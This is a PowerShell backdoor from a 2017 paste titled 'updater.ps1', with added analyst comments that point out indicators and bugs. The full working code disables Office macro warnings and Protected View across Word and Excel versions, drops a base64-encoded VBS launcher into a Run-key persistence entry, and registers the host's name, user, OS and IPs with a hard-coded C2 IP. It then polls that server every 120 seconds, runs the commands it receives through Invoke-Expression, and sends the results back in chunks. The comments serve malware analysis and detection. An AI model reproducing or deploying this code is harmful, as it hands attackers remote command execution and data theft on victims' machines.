opexxx

updater.ps1

Mar 9th, 2017
# Stage 1: weaken Office macro protections for the current user (HKCU, no elevation needed).
# Both loops blindly target every Office version key 10.0 .. 20.0, installed or not, so
# they also create keys for versions that do not exist on the host.
# Defender note: these value writes (AccessVBOM, VBAWarnings, Disable*InPV) are a
# high-signal registry artifact for this sample.
$Excel = New-Object -ComObject Excel.Application   # starts an Excel COM server; it is never Quit/released in the visible script
$ExcelVersion = $Excel.Version                     # read but not referenced anywhere else in this listing
for($i=10; $i -le 20; $i++){
    # AccessVBOM=1: trusted access to the VBA project object model.
    # VBAWarnings=1: "enable all macros" (no prompt). -Force overwrites existing values.
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force
    # Turn off Protected View for attachments, internet-origin files and unsafe locations.
    # ("Attachements" is the value name as written in the sample; left as-is.)
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableAttachementsInPV -Value 1 -PropertyType DWORD -Force
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableInternetFilesInPV -Value 1 -PropertyType DWORD -Force
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\excel\Security\ProtectedView" -Name DisableUnsafeLocationsInPV -Value 1 -PropertyType DWORD -Force
}
# Same five values for Word; note the argument order (-Value before -PropertyType) differs from
# the Excel loop, which has no effect on the result.
for($i=10; $i -le 20; $i++){
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security" -Name AccessVBOM -Value 1 -PropertyType DWORD -Force
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security" -Name VBAWarnings -Value 1 -PropertyType DWORD -Force
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableAttachementsInPV -Value 1 -PropertyType DWORD -Force
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableInternetFilesInPV -Value 1 -PropertyType DWORD -Force
    New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$i.0\word\Security\ProtectedView" -Name DisableUnsafeLocationsInPV -Value 1 -PropertyType DWORD -Force
}
# Stage 2: persistence. A per-user Run value named "Updater" points at a VBS dropped into the
# world-writable Public Documents folder. Both the Run value name and the conf.vbs path are
# direct indicators for this sample.
New-ItemProperty -Path HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name Updater -PropertyType String -Value 'C:\Users\Public\Documents\conf.vbs' -Force
# $x is the base64 of the launcher. Decoded it is a five-line WScript.Shell script that runs
# "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -file
# C:\Users\Public\Documents\Updater.ps1" with window style 0 (hidden); presumably this very
# script is meant to be staged under that name (the staging step is not in the listing).
$x='RGltIG9ialNoZWxsClNldCBvYmpTaGVsbCA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikKY29tbWFuZCA9ICJwb3dlcnNoZWxsLmV4ZSAtV2luZG93U3R5bGUgaGlkZGVuIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1ub2xvZ28gLW5vcHJvZmlsZSAtZmlsZSBDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXFVwZGF0ZXIucHMxIgpvYmpTaGVsbC5SdW4gY29tbWFuZCwwClNldCBvYmpTaGVsbCA9IE5vdGhpbmcK'
# Write the decoded launcher to disk (Out-File with its default encoding; no -Encoding given).
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($x)) | Out-File C:\Users\Public\Documents\conf.vbs
  20.  
  21. $config = @{'api'= 'http://138.201.75.227/v2/'; 'storagePath'= 'C:\Users\Public\Documents'; 'chunkSize'=1024; 'retryCount'=2}
# Base64-encode a string as UTF-8 bytes. Used for the registration payload and for command
# output before it is placed in the query string (see getKey / getCommand).
function encode
{
    param([string] $text)
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($text)
    [Convert]::ToBase64String($bytes)
}
  28.  
# Inverse of encode: base64 -> UTF-8 string. Applied to the command text received from the
# C2 (getCommand). Non-base64 input makes FromBase64String raise an error; nothing here catches it.
function decode
{
    param([string] $code)
    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code))
}
  34.  
  35.  
# Host fingerprinting: the first address of every IP-enabled adapter, skipping addresses that
# start with "169" (intended to drop link-local/APIPA), joined with '-' and with the leading
# '-' stripped. Feeds the registration payload in getKey.
# Caveat: if no adapter passes the filter, $ips is "" and subString(1) throws; the caller
# does not catch that.
function getIps
{
    $ips=""
    gwmi Win32_NetworkAdapterConfiguration -Filter "IPEnabled=True" | where{$_.IPAddress[0] -NotLike '169*'} | % {$ips = $ips + "-"+ $_.IPAddress[0]}
    return $ips.subString(1)
}
  42.  
# Runs C2-supplied text as PowerShell via Invoke-Expression and emits whatever it outputs.
# Only exceptions derived from System.SystemException are caught (the function then returns
# $false); non-terminating errors are not caught and go to the error stream.
# Defender note: the decoded command text is visible to PowerShell script block logging
# because it passes through Invoke-Expression.
function eval
{
    param([string] $expression)
    try {
        Invoke-Expression $expression
    } catch [System.SystemException] {
        return $false
    }
}
  52.  
# Single C2 transport: GET $config['api'] + $url over plaintext HTTP using WebClient.
# No headers (User-Agent etc.) are set in the visible code. All C2 actions (register,
# getCommand, saveResult) are query-string parameters on this one base URL.
# Caveat: on Net.WebException the exception *message* is returned as an ordinary string,
# so callers cannot tell a failed request from a response body (getKey and getCommand both
# rely on the content shape to distinguish them).
function httpGet
{
    param([string] $url)
    try {
        return (New-Object System.Net.WebClient).DownloadString("$($config['api'])$($url)")
    }
    catch [Net.WebException] {
        return $_.Exception.Message
    }
}
  63.  
# Exfiltrate a (base64) command result as GET requests:
#   ?action=saveResult&id=<key>&cmd=<cmdId>&res=<result>                    when result.Length < chunkSize
#   ...&chunk=0&res=..., ...&chunk=1&res=..., ..., ...&chunk=last&res=...    otherwise
# $result is interpolated raw into the query string (not URL-encoded).
# Retry behaviour: any reply other than the literal 'OK' decrements $j so the same chunk is
# re-sent after a 5 s sleep; $counter is never reset, so the transfer aborts after
# retryCount non-'OK' replies in total, not per chunk.
# Edge: $chunks = floor(len/chunkSize), so when the length is an exact multiple of chunkSize
# the final "chunk=last" request carries an empty res=.
function sendResult
{
    param([string] $key, [string] $cmdId, [string]$result)
    $prefix = "?action=saveResult&id=$key&cmd=$cmdId"
    $chunks = [math]::floor($result.Length / $config['chunkSize'])
    if($chunks -eq 0){
        httpGet "$prefix&res=$result"
    }else{
        $counter = 0;
        for($j=0; $j -le $chunks; ++$j){
            $httpResult=''
            if($j -eq $chunks){
                # tail: everything from the last full-chunk boundary to the end
                $chunk = $result.Substring($j*$config['chunkSize'])
                $httpResult = httpGet "$prefix&chunk=last&res=$chunk"
            }else{
                $chunk = $result.Substring($j*$config['chunkSize'],$config['chunkSize'])
                $httpResult = httpGet "$prefix&chunk=$j&res=$chunk"
            }
            if($httpResult -eq 'OK'){continue}
            ++$counter
            --$j   # cancels the loop's ++$j: retry this chunk
            if($counter -ge $config['retryCount']){break}
            Start-Sleep -s 5
        }
    }
}
  90.  
# Obtain the implant's numeric C2 id.
#  1. If <storagePath>\<username>.key exists and its content is all digits, return it.
#  2. Otherwise register: data = base64("<computername>::<username>::<arch>|<version>|<os[0]>|<os[1]>::<ips>")
#     sent as ?action=register&data=...; an all-digit reply is written to the key file and returned.
#  3. Any other reply (including a WebException message from httpGet, which is non-numeric)
#     returns $false, and the caller sleeps and retries.
# Defender notes: the *.key file in Public Documents and the register/data= request are
# artifacts; the OS name is queried three separate times via WMI here.
function getKey
{
    $keyPath = "$($config['storagePath'])\$($env:username).key"
    if((Test-Path $keyPath) -eq $true){
        $key = Get-Content $keyPath
        if($key -match "^\d+$"){
            return $key
        }
    }
    $os = (Get-WmiObject Win32_OperatingSystem).Name
    # NOTE(review): Windows PowerShell resolves Split('{|}', options) to the char[] overload,
    # so this splits on any of '{', '|', '}' — the intent is evidently the '|' in the WMI Name
    # string (typically "<product name>|<windows dir>|<boot device>"); confirm on the target runtime.
    $os = $os.Split('{|}', [System.StringSplitOptions]::RemoveEmptyEntries)
    $os ="$((Get-WmiObject Win32_OperatingSystem).OSArchitecture)|$((Get-WmiObject Win32_OperatingSystem).Version)|$($os[0])|$($os[1])"
    $data = "$($env:computername)::$($env:username)::$($os)::$(getIPs)"   # function names are case-insensitive; this is getIps
    $data = encode $data
    $id = httpGet "?action=register&data=$($data)"
    if($id.Length -gt 0){
        if($id -match "^\d+$"){
            Set-Content $keyPath $id
            return $id
        }
    }
    return $false
}
  114.  
# One tasking cycle: fetch ?action=getCommand&id=<key>; any body longer than 4 characters is
# treated as "<cmdId>::<base64 command>", decoded, executed through eval, the output whitespace-
# collapsed, base64-encoded and returned via sendResult. Returns $true when a body was processed,
# $false on a short/empty reply (the "no task" case).
# Caveats (not handled here):
#  - A WebException message from httpGet is also longer than 4 characters and enters this branch.
#  - The Split separator '{::}' is coerced to a char[] by Windows PowerShell (no
#    Split(string, options) overload in .NET Framework), so the split is on any '{', ':' or '}'
#    rather than on the literal token — verify on the target runtime.
function getCommand($key)
{
    $commands = httpGet -url "?action=getCommand&id=$key"
    if($commands.Length -gt 4){
        $parts = $commands.Split('{::}', [System.StringSplitOptions]::RemoveEmptyEntries)
        $id = $parts[0]
        $cmd = decode $parts[1]
        $res = ((eval $cmd) | Out-String)
        # shrink typical table output before encoding: runs of 4+ spaces -> one space, 4+ dashes -> "----"
        $res = $res -replace ' {4,}', ' '
        $res = $res -replace '\-{4,}', '----'
        $res = encode $res
        sendResult $key $id $res
        return $true
    }
    return $false
}
  131.  
  132.  
# Main loop. First block: retry registration every 120 s until getKey yields a numeric id.
# Second block: poll the C2 for tasks every 120 s, forever (no exit condition).
# Defender note: the fixed 120-second cadence of ?action=getCommand&id= GETs to the
# hard-coded IP is the beacon pattern to look for in proxy / flow logs.
while($true){
    $key = getKey
    if($key -eq $false){start-sleep -Seconds 120}
    else{break}
}
while ($true){
    getCommand $key
    start-sleep -Seconds 120
}